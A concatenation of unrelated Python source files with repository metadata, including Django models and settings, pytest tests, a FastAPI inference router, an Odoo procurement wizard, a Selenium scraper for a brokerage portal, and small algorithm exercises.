SearchFeedbackV1.objects.filter(pk=search_feedback.pk).update(
submitted_at=feedback.submitted_at,
)
feedback.delete()
class Migration(migrations.Migration):
initial = True
dependencies = [
("feedback", "0001_initial"),
]
operations = [
migrations.RunPython(migrate_search_feedback, migrations.RunPython.noop)
]
|
[
"noreply@github.com"
] |
uktrade.noreply@github.com
|
965bc7e325875ed234ebf3d269bc9a012f110885
|
c987e888b0ccd9051e26335b3641cbd80aa14e2a
|
/tests/circular/template/test_context.py
|
5db0e9c17d97674ab5b8c8d6f013bfc57113b782
|
[
"MIT"
] |
permissive
|
jonathanverner/circular
|
fa47eef5f2914da8540d0c0c50f3fe5d2d87d598
|
e29bb9cc846566943febd8ba85104d796943819c
|
refs/heads/master
| 2020-12-04T11:49:48.587539
| 2017-08-17T11:12:58
| 2017-08-17T11:12:58
| 66,577,154
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
import asyncio
import pytest
from src.circular.template.context import Context
def test_extension():
base = Context()
base.a = 10
base.c = 30
child = Context(base=base)
# Child should have access to parent
assert child.a == 10
# The _get method should work for accessing parent
assert child._get('a') == 10
# Child should not be allowed to modify parent
child.a = 20
assert child.a == 20
assert base.a == 10
# Attributes should propagate recursively
second_child = Context(base=child)
assert second_child.c == 30
assert second_child.a == 20
def test_future(event_loop):
asyncio.set_event_loop(event_loop)
ctx = Context()
    fut = asyncio.ensure_future(asyncio.sleep(0.1, result=3))  # asyncio.async() was renamed to ensure_future()
ctx.test = fut
assert hasattr(ctx, 'test') is False
event_loop.run_until_complete(fut)
assert ctx.test == 3
|
[
"jonathan.verner@matfyz.cz"
] |
jonathan.verner@matfyz.cz
|
d9a7f7e7bc166bb6f1556dbcbf9c4e875c736b66
|
e4dd3e5d76073b2ba2c8a06a713582a7b8fd6983
|
/eveauth/models/role.py
|
2bf7e073cbbce0bddcd8bc43d7af18ff587e8483
|
[] |
no_license
|
extraquoo/avrse-auth
|
792f1f217c682dfdace1467d81f2225976078750
|
5c94ac5e61954e37cc52dda0e884977b01eeff2a
|
refs/heads/master
| 2020-05-20T00:24:58.466016
| 2018-10-17T22:40:53
| 2018-10-17T22:40:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
from django.db import models
from .character import Character
class Role(models.Model):
character = models.ForeignKey(Character, related_name="roles")
name = models.CharField(max_length=128, db_index=True)
def __str__(self):
return "%s on %s" % (self.name, self.character.name)
|
[
"skylinerspeeder@gmail.com"
] |
skylinerspeeder@gmail.com
|
bdc3df8f4e675387177e4c1e95dbfe2ce8ad0c84
|
a46b064486b703b5424a5e59fb6d567a0c08d480
|
/scripts/pushmsg
|
fed86e723478dbd82c088dc2756750e5c891a332
|
[
"MIT"
] |
permissive
|
nick-youngblut/pushmsg
|
1dd3ca23dbfa8277f92b7261c5eabeb6ea5bd3c6
|
389cd22476077198593bd4b4af3900fd1644da65
|
refs/heads/master
| 2022-07-23T14:52:46.886835
| 2020-05-23T19:21:22
| 2020-05-23T19:21:22
| 71,820,460
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 530
|
#!/usr/bin/env python
import sys
import argparse
import pushmsg
parser = argparse.ArgumentParser(
description='Send messages with Pushbullet',
epilog='For all options, see the line magic help'
)
parser.add_argument('msg', help='Message to send via Pushbullet')
parser.add_argument('--version', action='version', version='0.0.1')
if __name__ == '__main__':
args = parser.parse_known_args()
sys.argv[-1] = '"' + sys.argv[-1] + '"'
line = ' '.join(sys.argv[1:])
p = pushmsg.PushMsg()
p.pushmsg(line)
|
[
"nicholas.youngblut@tuebingen.mpg.de"
] |
nicholas.youngblut@tuebingen.mpg.de
|
|
64811b756a4e41173c5e5898912f0448a3f966dc
|
1a3e6ff7b86fa34e4ef88f3e0fe7e1472f7f6821
|
/vortex-methods/vel_integration.py
|
7700104a2b37c85b4b1ae011fe0449ca7db1b4e2
|
[] |
no_license
|
rbonvall/tesis
|
0c901746c1b93aa300c928104455e23ef93bcf87
|
a93a07965387fc5a944a39eb734cfc34d0c09404
|
refs/heads/master
| 2020-05-30T22:09:38.621467
| 2011-07-04T14:47:33
| 2011-07-04T14:47:33
| 213,789
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
#!/usr/bin/env python
from numpy import zeros_like
import functools
import vm
def euler(x, y, circ, dt, squared_blob_size):
u, v = vm.eval_velocity(x, y, circ=circ,
squared_blob_size=squared_blob_size)
return u, v
def runge_kutta(x, y, circ, dt, squared_blob_size):
u, v = zeros_like(x), zeros_like(y)
eval_velocity = functools.partial(vm.eval_velocity, circ=circ,
squared_blob_size=squared_blob_size)
kx, ky = eval_velocity(x, y) # k1
u += kx/6
v += ky/6
dx, dy = kx * (dt/2), ky * (dt/2)
kx, ky = eval_velocity(x + dx, y + dy) # k2
u += kx/3
v += ky/3
dx, dy = kx * (dt/2), ky * (dt/2)
kx, ky = eval_velocity(x + dx, y + dy) # k3
u += kx/3
v += ky/3
dx, dy = kx * dt, ky * dt
kx, ky = eval_velocity(x + dx, y + dy) # k4
u += kx/6
v += ky/6
return u, v
|
[
"rbonvall@gmail.com"
] |
rbonvall@gmail.com
|
821fd4f3941c3016fc767da9f978015d7ee9d854
|
416e303e3c64fbc3571f204c3b3b281b4ce642be
|
/examples/1.3/special_batch_compo/list_dataset.py
|
4d37a894ac6da61939269cd7c3d88ef00cef73b7
|
[
"Apache-2.0"
] |
permissive
|
fastestimator-util/fastestimator-misc
|
6cba0f25ee5e9ace30bef392adc8081777db510f
|
c46e901d84745f35b7b49bdbb7b7121d39759b3f
|
refs/heads/master
| 2023-08-09T13:58:27.846807
| 2023-07-27T01:27:32
| 2023-07-27T01:27:32
| 208,510,459
| 8
| 9
|
Apache-2.0
| 2023-07-27T01:27:41
| 2019-09-14T22:14:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,455
|
py
|
import pdb
from os import pipe
from torch.utils.data import Dataset
import fastestimator as fe
from fastestimator.architecture.tensorflow import LeNet
from fastestimator.dataset import BatchDataset
from fastestimator.dataset.data import mnist
from fastestimator.op.numpyop.univariate import ExpandDims, Minmax
from fastestimator.op.tensorop import TensorOp
from fastestimator.op.tensorop.loss import CrossEntropy
from fastestimator.op.tensorop.model import ModelOp, UpdateOp
class NegativeImageSimulatedTube(Dataset):
def __init__(self, ds):
self.ds = ds
def __getitem__(self, idx):
        # create your 5 simulated images here; for simplicity, I will just copy the same image 5 times
image = self.ds[idx]["x"]
label = self.ds[idx]["y"]
return [{"x": image, "y": label} for _ in range(5)]
def __len__(self):
return len(self.ds)
def get_estimator():
ds, _ = mnist.load_data()
ds = NegativeImageSimulatedTube(ds)
pipeline = fe.Pipeline(train_data=ds, ops=[ExpandDims(inputs="x", outputs="x"), Minmax(inputs="x", outputs="x")])
model = fe.build(model_fn=LeNet, optimizer_fn="adam")
network = fe.Network(ops=[
ModelOp(model=model, inputs="x", outputs="y_pred"),
CrossEntropy(inputs=("y_pred", "y"), outputs="ce"),
UpdateOp(model=model, loss_name="ce")
])
estimator = fe.Estimator(pipeline=pipeline, network=network, epochs=2)
return estimator
|
[
"shawnmengdong@gmail.com"
] |
shawnmengdong@gmail.com
|
698bdeeb48ab9e92ecab93669f2d8d302bc0673a
|
abd7504f6562babf79fb4e86af7529b2cb40fb54
|
/tests/pyre.pkg/descriptors/dataDescriptor_set.py
|
7d7a5fd65cabe1f2c11b54febcf9ac6f7623788f
|
[] |
no_license
|
aivazis/p2
|
266c1728554b3f7a89e72f09ba2d9e5ff8d4447d
|
fd9a82d7dafa815dd68f679eb2b4b1a6287d02ea
|
refs/heads/main
| 2022-01-08T12:45:16.646028
| 2022-01-01T17:31:10
| 2022-01-01T17:31:10
| 225,452,981
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,247
|
py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# michael a.g. aïvázis <michael.aivazis@para-sim.com>
# (c) 1998-2022 all rights reserved
def test():
"""
Verify that the {__set__} method behaves as expected
"""
# get the descriptor class
from p2.descriptors.DataDescriptor import DataDescriptor as descriptor
# make a subclass
class trait(descriptor):
# that implements the protocol
def __get__(self, instance, cls):
# if this instance access
if instance is not None:
# retrieve the value from the {instance} inventory
return instance.inventory[self]
# otherwise, just return myself
return self
def __set__(self, instance, value):
# store {value} in the {instance} inventory
instance.inventory[self] = value
# all done
return self
# make a client
class Client:
raw = descriptor()
cooked = trait()
# metamethods
def __init__(self, **kwds):
# chain up
super().__init__(**kwds)
# initialize my inventory
self.inventory = {}
# all done
return
# instantiate
client = Client()
# first set the value of the base descriptor
try:
# this should raise an error
client.raw = 5
# so we shouldn't get here
assert False, "unreachable"
# trap the expected failure
except AttributeError as error:
# unpack the arguments
desc, instance = error.args
# verify that the instance is correct
assert instance is client
# access the functional descriptor before we ever set its value
try:
# the lookup is expected to fail
client.cooked
# so trap it
except KeyError as error:
        # get the key that caused the lookup to fail
key, *_ = error.args
# verify it's the trait we accessed
assert key == Client.cooked
# set the value
client.cooked = True
# and check
assert client.cooked is True
# all done
return
# main
if __name__ == "__main__":
# run the test
test()
# end of file
|
[
"michael.aivazis@para-sim.com"
] |
michael.aivazis@para-sim.com
|
57e3464578970c186bbf72034ecffedcb4f1e8e3
|
2b6ca87b32c18a1e48ffb64675abc97fda3bc6f6
|
/src/onecontainer_api/routers/ai.py
|
c017be766571aee37b503baa3b212c8fb8a5d995
|
[
"BSD-3-Clause"
] |
permissive
|
gabrielbriones/oneContainer-API
|
7882b86ff1c0b4fb4461de09deb96633e7fbed51
|
ea81ed31b921711d38d352ee3a9e56bd4231bf43
|
refs/heads/main
| 2023-01-22T17:45:20.345662
| 2020-12-04T20:50:18
| 2020-12-04T20:50:18
| 318,630,019
| 0
| 0
| null | 2020-12-04T20:39:23
| 2020-12-04T20:39:23
| null |
UTF-8
|
Python
| false
| false
| 2,008
|
py
|
"""AI vertical entrypoint."""
from typing import List
from fastapi import APIRouter, Depends, File, UploadFile
import databases
from onecontainer_api import models, schemas, errors
from onecontainer_api.routers import services, drivers
import re
router = APIRouter()
@router.get("/ai/{service_id}/usage",
description="Get functions available for this service")
async def usage(service_id: str, sync: bool = False, ttl: int = 3600, db: databases.Database = Depends(models.get_db)):
service = await services.get_service(service_id, db)
if service.driver:
driver = await drivers.get_driver(service.driver)
return drivers.service_stack(driver, service, "get", "/usage", sync=sync, ttl=ttl)
raise errors.ServiceException(service.id, errors.NO_DRV_ERROR, "Service has no driver assigned")
@router.post("/ai/{service_id}/serve",
description="Load a model")
async def serve(service_id: str, model_meta: schemas.AIModelMeta, sync: bool = False, ttl: int = 3600, db: databases.Database = Depends(models.get_db)):
service = await services.get_service(service_id, db)
if service.driver:
driver = await drivers.get_driver(service.driver)
return drivers.service_stack(driver, service, "post", "/serve", data=model_meta.dict(), sync=sync, ttl=ttl)
raise errors.ServiceException(service.id, errors.NO_DRV_ERROR, "Service has no driver assigned")
@router.post("/ai/{service_id}/predict",
description="Execute an inference over an image")
async def predict(service_id: str, image_file: UploadFile = File(...), sync: bool = False, ttl: int = 3600, db: databases.Database = Depends(models.get_db)):
service = await services.get_service(service_id, db)
if service.driver:
driver = await drivers.get_driver(service.driver)
return drivers.service_stack(driver, service, "post", "/predict", data=image_file, sync=sync, ttl=ttl)
raise errors.ServiceException(service.id, errors.NO_DRV_ERROR, "Service has no driver assigned")
|
[
"gabriel.briones.sayeg@intel.com"
] |
gabriel.briones.sayeg@intel.com
|
487a6cba227881b051690e18f580cda7c3918873
|
e77cbe31ed7eb052571a41cd7d68d110d3ca20ad
|
/procurement_request/wizard/procurement_request_wizard.py
|
b6a19b8f2dcd61f67039a71e4d929959d90cfdde
|
[] |
no_license
|
lopin123/falinwa_branch
|
237fa59d934e0672d1c55b95e619a7f4c97eb3b4
|
051821ec3d2691338953a38a5aed64a60c35113e
|
refs/heads/master
| 2021-01-02T22:34:36.390758
| 2015-04-08T07:58:27
| 2015-04-08T07:58:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,316
|
py
|
# -*- coding: utf-8 -*-
from openerp.osv import fields, orm
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
from dateutil.relativedelta import relativedelta
from datetime import date
class procurement_request_wizard(orm.TransientModel):
_name = "procurement.request.wizard"
_description = "Procurement Request Wizard"
_columns = {
'product_id' : fields.many2one('product.product','Product',required=True),
'product_qty' : fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
'date_order': fields.date('Order Date', required=True),
'partner_id' : fields.many2one('res.partner', 'Supplier', required=True),
'date_planned' : fields.date('Expected Date'),
}
def _get_supplier(self, cr, uid, context=None):
if context is None:
context = {}
product_obj = self.pool.get('product.product')
supplier_obj = self.pool.get('res.partner')
res = supplier_obj.search(cr, uid, [('name', '=', 'SUPPLIER TO BE DEFINED'),
('supplier', '=', True)],
limit=1)
if context.get('active_id',False):
product_id = product_obj.browse(cr, uid, context.get('active_id',False))
if product_id.seller_ids:
res = [product_id.seller_ids[0].name.id]
return res and res[0] or False
_defaults = {
'date_order': fields.date.context_today,
'product_qty': lambda *args: 1.0,
'partner_id': _get_supplier,
}
def make_procurement_request(self, cr, uid, ids, context=None):
if context is None:
context = {}
data_wizard = self.browse(cr, uid, ids, context)[0]
purchase_order_obj = self.pool.get('purchase.order')
warehouse_obj = self.pool.get('stock.warehouse')
warehouse_id = warehouse_obj.search(cr, uid, [], context=context)[0]
wh = warehouse_obj.browse(cr ,uid ,warehouse_id , context=context)
purchase_order_obj.create(cr, uid, {
'req_product_id' : data_wizard.product_id.id,
'req_product_description' : data_wizard.product_id.name,
'req_uom_id' : data_wizard.product_id.uom_po_id.id,
'req_product_qty' : data_wizard.product_qty,
'location_id' : wh.wh_input_stock_loc_id.id,
'date_order' : data_wizard.date_order+ ' 00:00:00',
'partner_id' : data_wizard.partner_id.id,
'pricelist_id' : data_wizard.partner_id.property_product_pricelist_purchase.id,
'origin' : 'Direct from Product',
'minimum_planned_date' : data_wizard.date_planned,
},context=context)
return {
'type': 'ir.actions.act_window',
'name': 'Procurement Request',
'res_model': 'purchase.order',
'view_mode': 'tree',
'view_type': 'form',
'view_id': self.pool.get('ir.model.data').get_object_reference(cr, uid, 'procurement_request', 'fal_procurement_request_tree')[1],
'target': 'current',
'nodestroy': False,
'domain': '[("state","=","procurement_request")]',
}
#end of procurement_request_wizard()
|
[
"hans.yonathan@falinwa.com"
] |
hans.yonathan@falinwa.com
|
6cf1014ce60dbc8ae7505b3d9a75e4852b1a3698
|
8f1c3c76bf8514818b733ba29fe575d8a5243add
|
/eduerp_attendance/models/__init__.py
|
e27612b75f471c9162dd01c4529d7609eddb4edc
|
[
"Apache-2.0"
] |
permissive
|
westlyou/eduerp
|
27f1c7dcd0d2badf50cb6c69f5e761d7f0c6a898
|
968d79b5adc729bc81192604f1fc223517d38ccf
|
refs/heads/master
| 2021-06-04T05:11:13.858246
| 2016-09-12T07:21:17
| 2016-09-12T07:21:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
###############################################################################
from . import attendance_line
from . import attendance_register
from . import attendance_sheet
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"huysamdua@yahoo.com"
] |
huysamdua@yahoo.com
|
f9a52da70f400cadaddf780a7db144d291e1f193
|
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
|
/sdk/python/pulumi_azure_native/iotcentral/_inputs.py
|
037588016bbe804fa5963d69b4ae4f963d2bd3ef
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
MisinformedDNA/pulumi-azure-native
|
9cbd75306e9c8f92abc25be3f73c113cb93865e9
|
de974fd984f7e98649951dbe80b4fc0603d03356
|
refs/heads/master
| 2023-03-24T22:02:03.842935
| 2021-03-08T21:16:19
| 2021-03-08T21:16:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,024
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from ._enums import *
__all__ = [
'AppSkuInfoArgs',
]
@pulumi.input_type
class AppSkuInfoArgs:
def __init__(__self__, *,
name: pulumi.Input[Union[str, 'AppSku']]):
"""
Information about the SKU of the IoT Central application.
:param pulumi.Input[Union[str, 'AppSku']] name: The name of the SKU.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> pulumi.Input[Union[str, 'AppSku']]:
"""
The name of the SKU.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[Union[str, 'AppSku']]):
pulumi.set(self, "name", value)
|
[
"noreply@github.com"
] |
MisinformedDNA.noreply@github.com
|
894b65e24be5bbe3bb8ae5de43cf5a4301381c52
|
7cc141beb2948f64e1b187862108b883f09bf71c
|
/NotasCorretagens/chromedriver.py
|
66a8495368cc630687cbb1b08c9fedc457e3a6c0
|
[
"MIT"
] |
permissive
|
felipemaion/scraping_xpi
|
5829a83d67da398cccd4d91c096108fe6f3cf0a7
|
522a5955c05a7da1e70055f7668f0e5e3593cf72
|
refs/heads/master
| 2020-05-02T15:39:59.604808
| 2019-04-01T07:58:05
| 2019-04-01T07:58:05
| 178,048,850
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,578
|
py
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait, Select
from selenium.webdriver.support.expected_conditions import presence_of_element_located
class Scraper:
def __init__(self, *args, **kwargs):
self.chrome_path = r'/Users/maion/bin/chromedriver'
self.driver = webdriver.Chrome(executable_path=self.chrome_path)
self.driver.get("https://portal.xpi.com.br")
# return super().__init__(*args, **kwargs)
def minha_conta(self):
return self.driver.find_element_by_xpath("""//*[@id="yield-portal-header"]/header/section[2]/div/nav/ul/li[1]/span""").click()
def notas_corretagens(self):
return self.driver.find_element_by_xpath("""//*[@id="yield-portal-header"]/header/section[2]/div/nav/ul/li[1]/ul/li[2]/dl/dd[4]/a""").click()
def combo_box(self):
return Select(self.driver.find_element_by_xpath("""//*[@id="Data"]"""))
def define_tipo_relatorio(self):
return self.driver.find_element_by_xpath("""//*[@id="rdbXP"]""").click()
def gera_relatorio(self):
return self.driver.find_element_by_xpath("""//*[@id="stNotasCor"]/article/div/div/span[4]/button""").click()
def baixa_relatorio(self):
return self.driver.find_element_by_xpath("""//*[@id="icon"]""")
def patrimonio(self):
return self.driver.find_element_by_xpath("""/html/body/div[2]/section/div[3]/div[1]/div/div[4]/p[1]/span/span""").text
scraper = Scraper()
|
[
"felipe.maion@gmail.com"
] |
felipe.maion@gmail.com
|
e3a292441f1962e474bd358f71425ba3ac374a99
|
8f48d12b88048e424ebb0d72ca6dfab5cf12ae0f
|
/1500_1999/1910.py
|
05f3524ffd5384049fc271225340944a7db37961
|
[] |
no_license
|
renjieliu/leetcode
|
e1caf13c18a8107ed9252588b339fb76bcb1b246
|
4668b64fcb9320b6c316d8608fc61911ce43b6c7
|
refs/heads/master
| 2023-03-18T18:16:06.187741
| 2023-03-14T20:31:59
| 2023-03-14T20:31:59
| 128,823,819
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
class Solution:
def removeOccurrences(self, s: str, part: str) -> str:
output = ""
for c in s:
output += c
while len(output) >= len(part) and output[-len(part):] == part:
output = output[:-len(part)]
return output
# previous approach
# class Solution:
# def removeOccurrences(self, s: str, part: str) -> str:
# while part in s:
# s = s.replace(part, '')
# return s
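# A minimal illustrative check, added here for clarity rather than taken from the
# original file: on the LeetCode 1910 sample input both the stack-based solution
# above and the commented-out replace-in-a-loop approach return "dab".
if __name__ == "__main__":
    assert Solution().removeOccurrences("daabcbaabcbc", "abc") == "dab"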
|
[
"anlrj@qq.com"
] |
anlrj@qq.com
|
54902efb2e961b3c0e80bfdb0b26efaa72d60f79
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_313/ch54_2020_03_31_00_22_57_884915.py
|
d4a200b530199c65a717529b916d673f8331f920
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
def calcula_fibonacci(n):
    fibonacci = [0]*100
    fibonacci[1] = 1
    fibonacci[0] = 1
    i = 2
    while(i < 100):
        fibonacci[i] = fibonacci[i-1]+fibonacci[i-2]
        i = i + 1
    # use a separate loop index so the argument n is not overwritten, and return the requested value
    return fibonacci[n]
|
[
"you@example.com"
] |
you@example.com
|
81f2858581aeddee8d0342e21d1ce3c9479530e8
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02262/s141204203.py
|
4d4e0e7ed1cedd407f0385ff3cc2d2558a5c8cde
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 660
|
py
|
cnt = 0
m = 0
g = []
def insertion_sort(a, n, g):
    # so that cnt += 1 looks up the variable outside the local scope
global cnt
for i in range(g, n):
v = a[i]
k = i - g
while k >= 0 and a[k] > v:
a[k+g] = a[k]
k -= g
cnt += 1
a[k+g] = v
def shell_sort(a, n):
global m, g
h = 1
while h <= n:
g.append(h)
h = h * 3 + 1
g.reverse()
m = len(g)
for i in range(m):
insertion_sort(a, n, g[i])
n = int(input())
a = [int(input()) for i in range(n)]
shell_sort(a, n)
print(m)
print(*g)
print(cnt)
for i in a:
print(i)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
537ea782435fb47f81c6431c0278bb50ccfe0c70
|
d8afb2e678d9da745a114e8feffee930218716b4
|
/backend/adv_test_3_23538/settings.py
|
ae68df3785b6f69fbc2d8f0ca426a63043c5a8f4
|
[] |
no_license
|
crowdbotics-apps/adv-test-3-23538
|
fd03929a6a4d8e984c2daad895d0c20fd80b4df5
|
e2af927fa78de374384d9d6b59a74207f4209bba
|
refs/heads/master
| 2023-02-12T15:18:53.318287
| 2020-12-24T19:38:53
| 2020-12-24T19:38:53
| 324,224,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,035
|
py
|
"""
Django settings for adv_test_3_23538 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'adv_test_3_23538.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'adv_test_3_23538.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
